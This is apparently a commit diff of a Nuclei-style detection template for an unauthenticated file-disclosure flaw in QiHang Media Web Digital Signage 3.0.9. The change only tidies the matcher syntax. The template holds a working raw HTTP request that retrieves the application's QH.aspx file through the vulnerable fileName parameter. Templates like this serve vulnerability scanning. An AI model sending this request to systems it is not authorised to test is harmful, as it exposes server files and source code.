vulnerabilities/other/qihang-media-lfi.yaml (before)
id: qihang-media-lfi

info:
  name: QiHang Media Web (QH.aspx) Digital Signage 3.0.9 - Arbitrary File Disclosure
  author: gy741
  severity: high
  description: The QiHang Media Web application suffers from an unauthenticated file disclosure vulnerability when input passed thru the filename parameter when using the download action or thru path parameter when
    using the getAll action is not properly verified before being used. This can be exploited to disclose contents of files and directories from local resources.
  reference:
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5581.php
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cwe-id: CWE-22
  tags: qihang,lfi,disclosure

requests:
  - raw:
      - |
        GET /QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fQH.aspx HTTP/1.1
        Host: {{Hostname}}
        Connection: close

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "filename=QH.aspx"
          - "application/zip"
        part: header
        condition: and

      - type: word
        regex:
          - "QH.aspx.cs"
          - "QiHang.Media.Web.QH"
        condition: and

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/04/20

vulnerabilities/other/qihang-media-lfi.yaml (after)
id: qihang-media-lfi

info:
  name: QiHang Media Web (QH.aspx) Digital Signage 3.0.9 - Arbitrary File Disclosure
  author: gy741
  severity: high
  description: The QiHang Media Web application suffers from an unauthenticated file disclosure vulnerability when input passed thru the filename parameter when using the download action or thru path parameter when
    using the getAll action is not properly verified before being used. This can be exploited to disclose contents of files and directories from local resources.
  reference:
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5581.php
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cwe-id: CWE-22
  tags: qihang,lfi,disclosure

requests:
  - raw:
      - |
        GET /QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fQH.aspx HTTP/1.1
        Host: {{Hostname}}
        Connection: close

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "filename=QH.aspx"
          - "application/zip"
        condition: and

      - type: word
        words:
          - "QH.aspx.cs"
          - "QiHang.Media.Web.QH"
        condition: and

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/04/20

vulnerabilities/other/qihang-media-lfi.yaml (diff)
@@ -24,14 +24,14 @@ requests:
     matchers-condition: and
     matchers:
       - type: word
+        part: header
         words:
           - "filename=QH.aspx"
           - "application/zip"
-        part: header
         condition: and
 
       - type: word
-        regex:
+        words:
           - "QH.aspx.cs"
           - "QiHang.Media.Web.QH"
         condition: and
